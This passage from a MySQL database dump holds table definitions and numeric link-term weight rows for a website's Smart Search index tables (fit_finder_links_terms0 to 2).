0.37331),(126,49096,0.95669),(126,49097,1.00331),(126,49098,0.37331),(126,49099,1.07331),(126,49100,1.28331),(126,49101,0.84),(126,49102,0.95669),(128,51137,0.88669),(128,51138,1.02669),(128,51139,0.86331),(128,51140,1.00331),(128,51141,0.91),(128,51142,1.05),(128,51143,0.98),(128,51144,0.46669),(128,51145,1.00331),(128,51146,1.09669),(128,51147,1.02669),(128,51148,1.19),(128,51149,1.02669),(128,51150,1.16669),(128,51151,0.86331),(128,51152,1.21331),(128,51153,0.98),(128,51154,0.98),(128,51155,1.09669),(128,51156,1.07331),(128,51157,1.21331),(128,51158,0.84),(128,51159,0.95669),(128,51160,0.91),(128,51161,1.05),(128,51162,0.93331),(128,51163,1.12),(128,51164,0.95669),(128,51165,1.07331),(128,51166,0.84),(128,51167,0.91),(128,51168,0.88669),(133,51168,1.77338),(128,51169,0.95669),(133,51169,1.91338),(128,51170,1.09669),(128,51171,1.26),(128,51172,0.98),(128,51173,1.07331),(128,51174,0.84),(128,51175,1.00331),(128,51176,0.79331),(128,51177,0.86331),(128,51178,0.88669),(128,51179,1.02669),(128,51180,0.84),(128,51181,1.09669),(128,51182,0.98),(128,51183,1.14331),(128,51184,0.46669),(128,51185,1.09669),(128,51186,1.19),(128,51686,1.12),(128,51687,0.98),(128,51688,0.84),(128,51689,1.02669),(128,51690,0.93331),(128,51691,1.12),(128,51692,0.93331),(128,51693,1.12),(128,51694,1.14331),(128,51695,1.21331),(128,51696,1.09669),(128,51697,0.91),(128,51698,1.16669),(128,51699,2.00662),(128,51700,1.23669),(128,51701,1.30669),(128,51702,0.98),(128,51703,1.05),(128,51704,1.07331),(128,51705,1.19),(128,51706,0.7),(128,51707,0.81669),(128,51708,1.14331),(128,51709,0.93331),(128,51710,1.26),(128,51711,1.12),(128,51712,1.23669),(128,51713,1.82),(128,51714,1.91338),(128,51715,0.86331),(128,51716,1.07331),(128,51717,1.05),(128,51718,0.91),(128,51719,1.12),(128,51720,1.02669),(128,51721,1.09669),(128,51722,0.91),(128,51723,0.95669),(128,51724,1.02669),(128,51725,1.21331),(128,51726,1.05),(128,51727,1.16669),(128,51728,0.93331),(128,51729,1.05),(128,51730,1.00331),(128,51731,1.16669),(128,51732,1.05),(128,51733,1.14331),(128,51734,0.91),(128,51735,1.14331),(128,51736,0.93331),(128,51737,1.02669),(128,51738,1.05),(128,51739,0.93331),(128,51740,1.07331),(128,51741,0.46669),(128,51742,1.05),(128,51743,1.21331),(128,51744,0.93331),(128,51745,1.02669),(128,51746,0.91),(128,51747,1.05),(128,51748,0.93331),(128,51749,1.09669),(128,51750,0.23331),(128,51751,0.95669),(128,51752,1.02669),(128,51753,0.28),(128,51754,1.05),(128,51755,1.23669),(128,51756,1.00331),(128,51757,1.05),(128,51758,1.05),(128,51759,0.46662),(128,51760,1.91338),(128,51761,1.09669),(128,51762,1.12),(128,51763,0.98),(128,51764,1.14331),(128,51765,0.32669),(128,51766,1.02669),(128,51767,1.14331),(128,51768,1.07331),(128,51769,1.30669),(128,51770,1.00331),(128,51771,1.05),(128,51772,0.37331),(128,51773,0.93331),(128,51774,1.00331),(128,51775,0.46662),(128,51776,0.95669),(128,51777,1.00331),(128,51778,0.98),(128,51779,1.09669),(128,51780,0.91),(128,51781,1.00331),(128,51782,1.09669),(128,51783,1.23669),(128,51784,0.37331),(128,51785,1.07331),(128,51786,1.23669),(128,51787,0.95669),(128,51788,1.09669),(128,51789,1.00331),(128,51790,1.12),(128,51791,1.12),(128,51792,1.21331),(128,51793,0.88669),(128,51794,1.09669),(128,51795,0.95669),(128,51796,1.09669),(128,51797,1.91338),(128,51798,1.07331),(128,51799,1.09669),(133,52360,1.05),(133,52361,1.12),(133,52362,1.09669),(133,52363,1.26),(133,52364,1.05),(133,52365,1.23669),(133,52366,2.1),(133,52367,1.23669),(133,52368,1.23669),(133,52369,1.05),(133,52370,1.23669),(133,52371,1.28331),(133,52372,1.14331),(133,52373,1.21331),(133,52374,1.30669),(133,52375,1.16669),(133,52376,1.35331),(133,52377,0.60669),(133,52378,1.16669),(133,52379,1.26),(133,52380,0.88669),(133,52381,0.95669),(133,52382,0.28),(133,52383,0.91),(133,52384,1.00331),(133,52385,0.91),(133,52386,1.14331),(133,52517,0.32669),(133,52518,1.16669),(133,52519,1.4),(133,52520,0.98),(133,52521,1.16669),(133,52522,1.12),(133,52523,1.37669),(133,52524,1.02669),(133,52525,1.09669),(133,52526,1.19),(133,52527,1.35331),(133,52528,0.51331),(133,52529,1.21331),(133,52530,1.30669),(133,52531,1.91338),(133,52532,2.47338),(133,52533,0.46669),(133,52534,1.02669),(133,52535,1.26),(133,52536,1.07331),(133,52537,1.33),(133,52538,1.00331),(133,52539,1.26),(133,52540,1.05),(133,52541,1.14331),(134,52586,1.82),(134,52587,1.05),(134,52588,1.07331),(134,52589,1.00331),(134,52590,1.16669),(134,52591,0.37331),(134,52592,1.09669),(134,52593,1.19),(134,52594,0.98),(134,52595,1.19),(134,52596,1.00331),(134,52597,1.19),(134,52598,1.09669),(134,52599,1.28331),(134,52600,0.81669),(134,52601,0.86331),(134,52724,0.91),(134,52725,1.12),(134,52726,1.12),(134,52727,1.96),(134,52728,1.21331),(134,52729,1.05),(134,52730,1.14331),(134,52731,1.07331),(134,52732,1.30669),(134,52733,1.00331),(134,52734,1.07331),(134,52735,0.28),(134,52736,1.00331),(134,52737,1.07331); /*!40000 ALTER TABLE `fit_finder_links_terms0` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_links_terms1` -- DROP TABLE IF EXISTS `fit_finder_links_terms1`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_links_terms1` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_links_terms1` -- LOCK TABLES `fit_finder_links_terms1` WRITE; /*!40000 ALTER TABLE `fit_finder_links_terms1` DISABLE KEYS */; INSERT INTO `fit_finder_links_terms1` VALUES (104,14375,0.07),(128,14375,0.07),(107,14375,0.2),(119,14376,0.14),(120,14376,0.14),(104,18261,0.77),(104,18262,0.88669),(106,20769,0.32669),(106,20770,1.02669),(106,20771,1.19),(110,25139,0.51331),(110,25140,1.14331),(110,25141,1.23669),(110,25142,0.28),(110,25143,1.05),(110,25144,1.14331),(111,29620,0.14),(111,29621,0.91),(111,29622,1.02669),(119,39825,0.86331),(119,39826,0.95669),(119,39827,0.42),(119,39828,0.95669),(119,39829,1.02669),(120,41124,0.93331),(120,41125,1.00331),(123,44477,0.21),(128,44477,0.42),(123,44478,0.91),(123,44479,1.00331),(126,48322,0.14),(126,48323,0.88669),(126,48324,1.00331),(126,48325,0.14),(126,48326,0.81669),(126,48327,0.95669),(128,51128,0.81669),(128,51129,0.95669),(128,51130,1.72662),(128,51131,0.93331),(128,51132,0.98); /*!40000 ALTER TABLE `fit_finder_links_terms1` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_links_terms2` -- DROP TABLE IF EXISTS `fit_finder_links_terms2`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_links_terms2` ( `link_id` int(10) unsigned NOT NULL, `term_id` int(10) unsigned NOT NULL, `weight` float unsigned NOT NULL, PRIMARY KEY (`link_id`,`term_id`), KEY `idx_term_weight` (`term_id`,`weight`), KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_links_terms2` -- LOCK TABLES `fit_finder_links_terms2` WRITE; /*!40000 ALTER TABLE `fit_finder_links_terms2` DISABLE KEYS */; INSERT INTO `fit_finder_links_terms2` VALUES (3,154,0.42),(3,155,1.02669),(3,156,1.19),(3,171,0.65338),(3,172,1.00331),(3,173,1.12),(3,174,1.00331),(3,175,1.12),(3,176,0.56),(3,177,0.98),(3,178,1.26),(3,179,0.91),(3,180,1.09669),(3,181,0.23331),(3,182,0.95669),(3,183,1.09669),(9,475,0.18669),(107,475,0.18669),(113,475,0.18669),(116,475,0.18669),(125,475,0.18669),(126,475,0.18669),(128,475,0.18669),(119,475,0.37338),(120,475,0.37338),(123,475,0.37338),(104,475,0.56007),(105,475,0.56007),(103,475,0.74676),(117,475,0.74676),(110,475,1.49352),(9,476,0.84),(103,476,0.84),(105,476,0.84),(110,476,0.84),(119,476,0.84),(123,476,0.84),(126,476,0.84),(9,477,1.00331),(9,478,0.18669),(9,479,0.91),(9,480,1.02669),(9,481,0.37331),(9,482,0.95669),(9,483,1.19),(35,1648,0.18669),(104,1648,0.18669),(106,1648,0.18669),(107,1648,0.18669),(109,1648,0.18669),(117,1648,0.18669),(118,1648,0.18669),(125,1648,0.18669),(116,1648,0.37338),(113,1648,0.56007),(22,3045,0.8),(24,3054,0.5334),(24,3055,2.7334),(24,3056,0.8),(55,3066,0.23331),(25,3066,0.6666),(25,3067,2.6),(25,3068,2.9334),(35,9490,0.37331),(120,9490,0.37331),(35,9491,0.98),(35,9492,1.19),(126,9493,0.14),(128,9493,0.14),(35,9493,0.28),(112,9493,0.28),(119,9493,0.28),(125,9493,0.28),(103,9493,0.42),(110,9493,0.42),(117,9493,0.42),(120,9493,0.42),(123,9493,0.42),(107,9493,0.56),(118,9493,0.56),(106,9493,1.4),(35,9494,0.86331),(35,9495,1.05),(35,9496,0.84),(120,9496,0.84),(35,9497,0.91),(120,9497,0.91),(35,9498,0.28),(125,9498,0.28),(110,9498,0.56),(120,9498,0.56),(35,9499,0.95669),(35,9500,1.02669),(35,9501,0.28),(35,9502,0.91),(35,9503,1.09669),(35,9504,0.18669),(104,9504,0.18669),(35,9505,0.88669),(35,9506,1.07331),(35,9568,0.32669),(120,9568,0.65338),(35,9569,1.09669),(35,9570,1.28331),(35,9571,0.28),(103,9571,0.28),(35,9572,1.05),(35,9573,1.26),(35,9574,0.86331),(104,9574,0.86331),(117,9574,0.86331),(113,9574,2.58993),(35,9575,1.14331),(35,9576,0.32669),(35,9577,0.95669),(35,9578,1.21331),(111,10632,0.14),(52,11757,0.04669),(58,11757,0.04669),(110,11757,0.04669),(117,12082,0.18669),(120,12082,0.18669),(123,12082,0.18669),(105,12082,0.37338),(118,12082,0.37338),(121,12082,0.5334),(52,12202,0.86331),(52,12203,1.09669),(52,12204,0.18669),(104,12204,0.18669),(118,12204,0.18669),(119,12204,0.18669),(134,12204,0.18669),(123,12204,0.37338),(128,12204,0.37338),(126,12204,0.56007),(52,12205,1.07331),(52,12206,1.19),(55,12423,0.91),(55,12424,1.02669),(55,12431,0.09331),(55,12432,0.91),(55,12433,1.02669),(55,12434,0.28),(55,12435,0.95669),(55,12436,1.00331),(55,12437,0.18669),(55,12438,0.84),(55,12439,1.00331),(58,12609,0.81669),(58,12610,1.07331),(58,12634,0.51331),(58,12635,1.12),(58,12636,1.4),(113,13038,0.32669),(116,13038,0.32669),(119,13038,0.32669),(68,13544,0.14),(103,13544,0.14),(105,13544,0.14),(107,13544,0.14),(112,13544,0.14),(126,13544,0.14),(104,13544,0.42),(110,13544,0.84),(119,13544,0.84),(120,13544,1.54),(68,13545,0.91),(68,13546,1.00331),(105,13820,0.28),(110,14046,0.18669),(120,14046,0.18669),(125,14046,0.18669),(126,14046,0.37338),(118,14107,0.32669),(110,14110,0.28),(134,14110,0.28),(126,14116,0.23331),(110,14116,0.46662),(106,14543,0.23331),(128,14543,0.23331),(106,15671,0.04669),(114,15671,0.04669),(125,15671,0.04669),(105,15671,0.18676),(107,16686,0.14),(112,16686,0.14),(125,16686,0.14),(126,16686,0.14),(104,16686,0.28),(105,16686,0.28),(119,16686,0.28),(120,16686,0.28),(103,16686,0.42),(103,16687,0.98),(103,16688,1.14331),(103,16689,0.91),(103,16690,1.02669),(103,16691,0.98),(103,16692,1.12),(103,16693,0.32669),(103,16694,1.14331),(103,16695,1.23669),(103,16696,0.23331),(113,16696,0.23331),(103,16697,0.98),(103,16698,1.05),(103,16699,0.37331),(112,16699,0.37331),(103,16700,0.95669),(103,16701,1.05),(103,16702,0.18669),(126,16702,0.18669),(119,16702,0.37338),(103,16703,0.86331),(103,16704,0.98),(103,16705,0.23331),(103,16706,0.93331),(103,16707,1.05),(103,16708,0.95669),(103,16709,1.05),(103,16710,0.91),(103,16711,1.02669),(103,16712,0.88669),(103,16713,1.09669),(103,16714,0.95669),(103,16715,0.93331),(103,16716,1.00331),(107,16717,0.86331),(125,16717,0.86331),(103,16717,1.72662),(103,16718,1.00331),(103,16719,0.98),(103,16720,0.18669),(119,16720,0.18669),(103,16721,0.88669),(103,16722,1.00331),(119,16723,0.18669),(123,16723,0.18669),(126,16723,0.18669),(103,16723,0.56007),(103,16724,0.88669),(123,16724,0.88669),(103,16725,1.05),(103,16726,1.82),(103,16727,2.05338),(103,16728,0.18669),(112,16728,0.18669),(120,16728,0.18669),(125,16728,0.18669),(106,16728,0.37338),(103,16729,0.88669),(103,16730,0.95669),(103,16731,0.93331),(103,16732,1.21331),(103,16733,0.14),(112,16733,0.28),(103,16734,0.86331),(103,16735,1.02669),(103,16736,0.32669),(113,16736,0.32669),(117,16736,0.32669),(119,16736,0.32669),(103,16737,0.95669),(103,16738,1.09669),(103,16951,0.32669),(103,16952,1.07331),(103,16953,1.23669),(103,16954,0.18669),(110,16954,0.18669),(103,16955,0.86331),(110,16955,0.86331),(103,16956,1.00331),(103,16957,0.28),(103,16958,0.95669),(103,16959,1.09669),(103,16960,0.37331),(103,16961,1.07331),(103,16962,1.14331),(103,16963,0.32669),(120,16963,0.32669),(103,16964,1.00331),(103,16965,1.19),(103,16966,0.32669),(103,16967,0.98),(103,16968,1.05),(103,16969,0.28),(103,16970,0.88669),(103,16971,1.05),(103,16972,0.32669),(103,16973,0.98),(103,16974,1.14331),(103,16975,0.91),(103,16976,1.02669),(103,16977,0.28),(103,16978,1.09669),(103,16979,1.19),(103,16980,0.23331),(103,16981,1.05),(103,16982,1.23669),(103,16983,0.14),(113,16983,0.14),(117,16983,0.14),(103,16984,0.86331),(103,16985,0.98),(104,16986,0.18669),(112,16986,0.18669),(113,16986,0.18669),(125,16986,0.18669),(103,16986,0.37338),(107,16986,0.37338),(117,16986,0.74676),(103,16987,1.02669),(103,16988,1.26),(103,16989,0.86331),(103,16990,1.00331),(103,16991,0.51331),(110,16991,0.51331),(103,16992,1.05),(103,16993,1.14331),(103,16994,0.23331),(103,16995,0.88669),(103,16996,1.09669),(103,16997,0.18669),(106,16997,0.18669),(116,16997,0.18669),(118,16997,0.18669),(103,16998,0.91),(103,16999,1.02669),(103,17000,0.28),(103,17001,0.91),(103,17002,1.09669),(103,17003,0.42),(103,17004,1.09669),(103,17005,1.21331),(103,17006,0.28),(110,17006,0.28),(112,17006,0.28),(125,17006,0.28),(123,17006,0.56),(103,17007,0.98),(103,17008,1.05),(103,17009,0.18669),(117,17009,0.18669),(120,17009,0.93345),(128,17009,0.93345),(104,17009,1.12014),(113,17009,1.30683),(103,17010,0.95669),(103,17011,1.05),(103,17012,0.23331),(103,17013,0.93331),(103,17014,1.12),(103,17015,0.14),(106,17015,0.14),(107,17015,0.14),(112,17015,0.14),(118,17015,0.14),(119,17015,0.14),(128,17015,0.14),(103,17016,0.84),(106,17016,0.84),(107,17016,0.84),(118,17016,0.84),(128,17016,0.84),(103,17017,0.95669),(103,17018,0.23331),(103,17019,0.93331),(103,17020,1.00331),(104,18589,0.88669),(119,18589,0.88669),(104,18590,1.09669),(104,18591,0.84),(104,18592,0.93331),(104,18593,0.18669),(104,18594,0.91),(104,18595,1.05),(104,18596,0.23331),(112,18596,0.23331),(117,18596,0.23331),(120,18596,0.23331),(104,18597,0.88669),(104,18598,1.00331),(104,18599,0.91),(105,18599,0.91),(110,18599,0.91),(120,18599,0.91),(104,18600,1.05),(104,18601,0.93331),(104,18602,1.05),(104,18603,0.88669),(104,18604,1.00331),(106,18605,0.09331),(125,18605,0.09331),(110,18605,0.18662),(126,18605,0.18662),(112,18605,0.27993),(119,18605,0.65317),(107,18605,0.74648),(104,18605,0.83979),(120,18605,1.67958),(104,18606,0.84),(104,18607,1.00331),(104,18608,0.84),(104,18609,0.95669),(104,18610,0.88669),(104,18611,1.02669),(104,18612,0.88669),(104,18613,0.98),(104,18614,0.93331),(104,18615,1.07331),(106,18616,0.84),(107,18616,0.84),(112,18616,0.84),(104,18616,1.68),(119,18616,1.68),(120,18616,4.2),(104,18617,1.00331),(104,18618,1.02669),(104,18619,0.91),(104,18620,1.12),(104,18621,0.91),(104,18622,0.98),(104,18623,0.28),(104,18624,0.93331),(104,18625,0.98),(104,18626,0.23331),(104,18627,0.95669),(104,18628,1.02669),(104,18629,0.93331),(104,18630,1.07331),(104,18631,0.91),(104,18632,1.07331),(104,18633,1.05),(104,18634,1.14331),(104,18635,0.91),(104,18636,1.07331),(104,18637,0.88669),(104,18638,1.05),(104,18639,0.18669),(104,18640,0.93331),(104,18641,1.07331),(104,18642,0.46662),(104,18643,1.86662),(104,18644,1.00331),(104,18645,1.07331),(104,18646,0.18669),(105,18646,0.18669),(117,18646,0.18669),(123,18646,0.18669),(104,18647,0.88669),(105,18647,0.88669),(117,18647,0.88669),(123,18647,0.88669),(104,18648,1.00331),(105,18648,1.00331),(117,18648,1.00331),(104,18649,0.14),(104,18650,0.91),(104,18651,1.02669),(104,18719,0.23331),(113,18719,0.23331),(128,18719,0.23331),(104,18720,0.95669),(104,18721,1.05),(126,18722,0.18669),(134,18722,0.18669),(104,18722,0.37338),(107,18722,0.37338),(118,18722,0.37338),(120,18722,0.37338),(104,18723,0.98),(104,18724,1.05),(104,18725,0.91),(104,18726,1.12),(104,18727,0.23331),(119,18727,0.23331),(110,18727,0.46662),(120,18727,0.46662),(104,18728,0.91),(104,18729,0.98),(110,18730,0.28),(112,18730,0.28),(104,18730,0.56),(106,18730,0.56),(109,18730,0.56),(111,18730,0.56),(120,18730,0.56),(105,18730,1.12),(121,18730,1.12),(117,18730,1.4),(114,18730,2.52),(128,18730,15.4),(113,18730,28.28),(104,18731,1.00331),(106,18731,1.00331),(109,18731,1.00331),(120,18731,1.00331),(114,18731,2.00662),(117,18731,2.00662),(104,18732,1.12),(104,18733,0.98),(104,18734,1.12),(104,18735,0.32669),(104,18736,1.02669),(104,18737,1.12),(104,18738,0.18669),(105,18738,0.18669),(116,18738,0.18669),(118,18738,0.18669),(120,18738,0.18669),(107,18738,0.37338),(112,18738,0.56007),(104,18739,0.91),(104,18740,1.02669),(104,18741,0.88669),(104,18742,1.07331),(104,18743,0.23331),(104,18744,0.93331),(104,18745,1.00331),(104,18746,0.28),(110,18746,0.28),(104,18747,0.88669),(104,18748,0.93331),(104,18749,0.98007),(104,18750,1.00331),(104,18751,1.09669),(104,18752,0.93331),(104,18753,1.02669),(104,18754,1.02669),(104,18755,1.19),(104,18756,1.05),(104,18757,1.09669),(104,18758,0.86331),(104,18759,0.98),(104,18760,1.05),(104,18761,1.12),(104,18762,0.88669),(104,18763,0.98),(104,18764,0.93331),(104,18765,1.02669),(104,18766,0.93331),(104,18767,1.09669),(104,18768,1.05),(104,18769,0.23331),(104,18770,0.93331),(104,18771,1.05),(104,18772,0.28),(104,18773,0.91),(104,18774,1.02669),(105,19850,0.81669),(119,19850,0.81669),(105,19851,0.91),(105,19852,0.84),(105,19853,1.00331),(105,19854,0.18669),(125,19854,0.18669),(105,19855,0.95669),(105,19856,1.07331),(105,19857,0.37331),(117,19857,0.37331),(105,19858,1.09669),(105,19859,1.16669),(105,19860,0.98),(105,19861,0.98),(105,19862,0.88669),(105,19863,1.05),(105,19864,0.23331),(105,19865,0.88669),(105,19866,0.93331),(105,19867,0.32669),(105,19868,1.05),(105,19869,1.19),(106,19870,0.14),(116,19870,0.14),(123,19870,0.14),(125,19870,0.14),(112,19870,0.28),(119,19870,0.28),(105,19870,0.42),(110,19870,0.98),(105,19871,0.86331),(105,19872,0.98),(105,19873,0.84),(105,19874,0.95669),(105,19875,0.84),(105,19876,0.93331),(105,19877,0.95669),(105,19878,1.12),(105,19879,0.23331),(105,19880,1.00331),(105,19881,1.21331),(113,19882,0.18669),(105,19882,0.37338),(110,19882,0.37338),(105,19883,0.91),(105,19884,1.07331),(105,19885,0.91),(105,19886,1.05),(105,19887,0.32669),(105,19888,0.93331),(105,19889,1.02669),(105,19890,0.28),(105,19891,0.81669),(105,19892,0.98),(105,19893,0.93324),(105,19894,0.91),(105,19895,1.00331),(105,19896,0.88669),(105,19897,1.00331),(105,19898,0.93331),(105,19899,1.00331),(105,19900,0.91),(105,19901,1.02669),(105,19902,0.0175),(106,19902,0.0175),(107,19902,0.0175),(110,19902,0.0175),(112,19902,0.0175),(117,19902,0.0175),(125,19902,0.0175),(105,19903,0.91),(105,19904,0.98),(105,20025,0.86331),(105,20026,1.05),(105,20027,0.95669),(105,20028,1.05),(105,20029,0.88669),(105,20030,1.09669),(105,20031,0.91),(105,20032,1.00331),(105,20033,0.18669),(105,20034,0.93331),(105,20035,1.07331),(105,20036,0.98),(105,20037,1.16669),(105,20038,0.91),(105,20039,1.02669),(110,20040,0.91),(112,20040,0.91),(105,20040,1.82),(105,20041,1.02669),(105,20042,1.07331),(105,20043,0.93331),(105,20044,1.05),(105,20045,0.74662),(105,20046,1.05),(105,20047,1.19),(105,20048,0.98),(105,20049,1.07331),(105,20050,0.23331),(119,20050,0.23331),(120,20050,0.23331),(105,20051,0.91),(120,20051,0.91),(105,20052,1.07331),(105,20053,0.42),(105,20054,1.02669),(105,20055,1.19),(105,20056,0.32669),(105,20057,0.95669),(105,20058,1.05),(105,20059,1.02669),(105,20060,1.16669),(105,20061,0.93331),(105,20062,1.02669),(105,20063,1.05),(105,20064,1.14331),(105,20065,0.14),(105,20066,1.05),(105,20067,1.16669),(105,20068,0.46662),(105,20069,0.88669),(105,20070,0.98),(105,20071,0.88669),(105,20072,0.98),(105,20073,0.18669),(105,20074,0.95669),(105,20075,1.07331),(105,20076,0.37331),(110,20076,0.37331),(105,20077,1.09669),(105,20078,1.30669),(106,21300,0.37331),(106,21301,0.95669),(106,21302,1.14331),(106,21303,1.00331),(106,21304,1.12),(106,21305,0.95669),(106,21306,1.19),(106,21307,0.84),(106,21308,1.16669),(110,21309,0.88669),(119,21309,0.88669),(126,21309,0.88669),(106,21309,1.77338),(107,21309,1.77338),(123,21309,1.77338),(106,21310,0.93331),(126,21310,0.93331),(106,21311,1.00331),(106,21312,3.64),(106,21313,3.92),(106,21314,0.88669),(106,21315,0.95669),(106,21316,0.95669),(106,21317,1.05),(106,21318,1.14331),(106,21319,0.18669),(106,21320,0.91),(106,21321,1.07331),(106,21322,0.93331),(106,21323,1.05),(106,21324,0.86331),(106,21325,0.91),(106,21326,0.32669),(106,21327,0.93331),(106,21328,1.00331),(106,21329,0.32669),(107,21329,0.65338),(106,21330,0.98),(106,21331,1.09669),(106,21332,0.37331),(106,21333,0.93331),(106,21334,1.14331),(106,21335,0.23331),(106,21336,1.02669),(106,21337,1.16669),(106,21338,0.23331),(110,21338,0.23331),(106,21339,1.05),(106,21340,1.23669),(106,21341,0.88669),(106,21342,1.02669),(106,21433,0.79331),(125,21433,0.79331),(106,21434,0.93331),(106,21435,0.28),(119,21435,0.28),(106,21436,0.95669),(106,21437,1.07331),(106,21438,0.23331),(106,21439,0.91),(106,21440,1.00331),(123,21441,0.37331),(134,21441,0.37331),(106,21441,0.74662),(106,21442,0.95669),(106,21443,1.07331),(106,21444,0.95669),(106,21445,1.14331),(106,21446,1.00331),(106,21447,1.12),(106,21448,1.07331),(120,21448,1.07331),(113,21449,0.28),(106,21449,0.56),(106,21450,1.02669),(106,21451,1.19),(106,21452,0.95669),(106,21453,1.14331),(106,21454,0.32669),(106,21455,0.98),(106,21456,1.07331),(106,21457,0.91),(106,21458,1.05),(106,21459,0.37338),(106,21460,0.86331),(106,21461,0.95669),(106,21462,1.02669),(106,21463,1.21331),(106,21464,0.18669),(106,21465,0.93331),(106,21466,1.07331),(106,21467,0.32669),(110,21467,0.98007),(106,21468,1.05),(106,21469,1.16669),(106,21470,0.28),(106,21471,0.93331),(106,21472,1.05),(106,21473,0.86331),(116,21473,0.86331),(106,21474,0.93331),(106,21475,0.18669),(110,21475,0.18669),(117,21475,0.18669),(106,21476,1.02669),(106,21477,1.12),(106,21478,0.23331),(106,21479,0.98),(106,21480,1.12),(106,21481,0.37331),(110,21481,0.37331),(106,21482,1.09669),(106,21483,1.16669),(106,21484,0.86331),(106,21485,1.02669),(106,21486,0.98),(106,21487,0.23331),(106,21488,1.00331),(106,21489,1.16669),(112,21490,0.18669),(116,21490,0.18669),(106,21490,0.74676),(106,21491,0.93331),(106,21492,1.00331),(106,21493,1.82),(106,21494,1.05),(106,21495,1.09669),(106,21496,0.86331),(106,21497,0.98),(106,21498,0.23331),(110,21498,0.23331),(106,21499,0.88669),(106,21500,1.02669),(107,22534,0.88669),(107,22535,0.98),(107,22536,2.14662),(107,22537,1.96),(107,22538,1.23669),(107,22539,1.23669),(107,22540,0.98),(107,22541,1.91338),(107,22542,2.05338),(107,22543,0.98),(107,22544,1.19),(107,22545,1.77338),(107,22546,1.91338),(107,22547,1.82),(107,22548,2.14662),(107,22549,1.00331),(112,22549,1.00331),(107,22550,2.14662),(107,22551,2.61338),(107,22552,0.88669),(107,22553,1.00331),(107,22554,0.86331),(107,22555,0.98),(107,22556,0.84),(107,22557,2.28662),(107,22558,2.47338),(107,22638,1.77338),(107,22639,1.91338),(107,22640,0.56),(107,22641,1.96),(107,22642,2.1),(107,22643,1.72662),(107,22644,1.91338),(107,22645,1.91338),(107,22646,2.14662),(107,22647,0.88669),(116,22647,0.88669),(107,22648,1.07331),(107,22649,0.95669),(107,22650,0.56),(107,22651,1.86662),(107,22652,2.14662),(107,22653,1.91338),(107,22654,2.19338),(123,23514,0.81669),(125,23514,0.81669),(123,23566,0.18669),(110,23692,0.91),(120,23705,0.86331),(117,23707,0.28),(109,24686,0.09331),(114,24686,0.18662),(111,24686,0.37324),(109,24687,0.95669),(109,24688,1.00331),(109,24689,0.37338),(109,24690,1.91338),(109,24691,1.02669),(109,24692,1.00331),(109,24721,0.37331),(109,24722,0.95669),(109,24723,1.16669),(117,24724,0.09331),(125,24724,0.09331),(114,24724,0.27993),(109,24724,0.65317),(111,24724,1.39965),(109,24725,1.09669),(109,24726,1.23669),(109,24727,1.72662),(109,24728,0.95669),(109,24729,1.02669),(109,24730,1.77338),(109,24731,2.05338),(109,24732,1.07331),(109,24733,1.21331),(109,24734,0.91),(109,24735,0.98),(109,24736,0.37331),(109,24737,0.98),(109,24738,1.12),(109,24739,1.05),(109,24740,0.95669),(114,24740,0.95669),(117,24740,0.95669),(121,24740,0.95669),(128,24740,15.307),(113,24740,24.8739),(109,24741,1.12),(113,24741,1.12),(114,24741,1.12),(121,24741,1.12),(128,24741,1.12),(121,24742,0.09331),(125,24742,0.09331),(109,24742,0.18662),(114,24742,0.18662),(111,24742,0.37324),(109,24743,0.86331),(109,24744,1.33),(109,24745,0.88669),(109,24746,1.09669),(109,24747,0.32669),(109,24748,0.91),(109,24749,1.19),(111,24750,0.23331),(109,24750,0.46662),(109,24751,2.00662),(109,24752,1.26),(109,24753,1.21331),(109,24754,0.37331),(109,24755,1.00331),(109,24756,1.16669),(109,24757,0.14),(109,24758,0.91),(109,24759,1.21331),(109,24760,0.84),(109,24761,1.09669),(110,26785,0.79331),(110,26786,1.12),(110,26787,0.18669),(112,26787,0.18669),(119,26787,0.18669),(110,26788,0.93331),(110,26789,1.05),(110,26790,0.37331),(110,26791,1.00331),(110,26792,1.09669),(110,26793,0.37331),(110,26794,1.07331),(110,26795,1.16669),(110,26796,1.07331),(110,26797,0.95669),(110,26798,1.07331),(110,26799,0.95669),(110,26800,1.14331),(110,26801,0.98),(110,26802,0.88669),(110,26803,1.14331),(110,26804,1.12),(110,26805,1.02669),(110,26806,1.16669),(110,26807,0.86331),(110,26808,0.95669),(110,26809,0.86331),(110,26810,1.26),(110,26811,1.02669),(110,26812,1.12),(110,26813,0.95669),(110,26814,1.05),(110,26815,0.56),(110,26816,1.16669),(110,26817,1.23669),(110,26818,1.14331),(110,26819,1.26),(110,26820,0.91),(110,26821,0.98),(110,26822,0.32669),(110,26823,1.02669),(110,26824,1.07331),(110,26825,0.84),(110,26826,1.12),(110,26827,0.84),(110,26828,1.00331),(110,26829,1.02669),(110,26830,1.12),(110,26831,1.82),(110,26832,0.98),(110,26833,0.98),(110,26834,0.93331),(110,26835,1.07331),(110,26836,0.98),(110,26837,1.09669),(110,26838,0.91),(110,26839,1.16669),(110,26840,0.91),(110,26841,1.05),(110,26842,0.84),(110,26843,0.91),(110,26844,0.84),(110,26845,1.09669),(110,26846,1.16669),(110,26847,1.02669),(110,26848,1.35331),(110,26849,0.28),(110,26850,1.12),(110,26851,1.30669),(110,26852,0.56),(110,26853,0.93331),(110,26854,1.09669),(110,26855,0.95669),(110,26856,1.02669),(110,26857,0.14),(113,26857,0.14),(120,26857,0.14),(112,26857,0.28),(119,26857,0.42),(110,26858,0.86331),(110,26859,0.93331),(110,26860,5.17986),(110,26861,2.00662),(110,26862,1.02669),(110,26863,1.07331),(110,26864,1.00331),(110,26865,1.00331),(110,26866,0.18669),(119,26866,0.18669),(120,26866,0.18669),(128,26866,0.18669),(110,26867,1.00331),(110,26868,1.19),(110,26869,0.88669),(110,26870,1.00331),(110,26871,0.98),(110,26872,1.16669),(